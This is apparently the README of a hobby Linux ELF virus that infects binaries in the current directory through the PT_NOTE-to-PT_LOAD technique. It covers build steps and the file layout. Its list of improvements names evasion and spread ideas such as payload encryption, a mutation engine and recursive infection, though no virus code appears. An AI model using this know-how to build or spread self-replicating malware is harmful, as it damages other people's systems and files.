An ELF Virus Leveraging The PT_NOTE to PT_LOAD Technique.
This is my first ever virus for 64bit Linux ELF binaries. It infects all
64bit ELF binaries in the current directory (non-recursively) using the
PT_NOTE->PT_LOAD technique and displays a little message as a payload.
All infected binaries are marked with GNS in the ELF header padding.
Warning
Even though it doesn't have a destructive payload, this is (obviously) a destructive binary, run at your own risk. I am not in any way, shape or form responsible for the damages you cause with this.
That being said, please don't spread this out in the wild. :)
Building the project is straight-forward:
# For standard assembling:
make
# For assembling with debug info:
make debugThe resulting binary will be created in bin/.
< demo-video placeholder >
The project is structured in the following way:
.
├── Makefile
├── README.md <-- You are here :)
├── src
│ ├── Genesis.asm <-- The actual Virus Source
│ ├── Macros.asm <-- Helper Macros
│ └── Structs.asm <-- Struct definitions
└── test
└── target <-- 'Hello World' Bin for Testing PurposesDue to the virus being a quick little side project, I made it pretty stupid so
there is a lot to improve. For one, the payload, or the whole virus, could be
encrypted and then decrypted at runtime. One could also find a better way to
watermark the infected files instead of overwriting the ELF header padding.
Additionally the file-enumeration logic could be rewritten to recurse into
directories. Finally instead of overwriting the e_entry value, one could patch
cxa_finalize.
Further Ideas:
- Mutation engine via basic block shuffling
- Encryption via simple XOR
- Compression using the ZX0 algorithm (decompress backwards to save memory)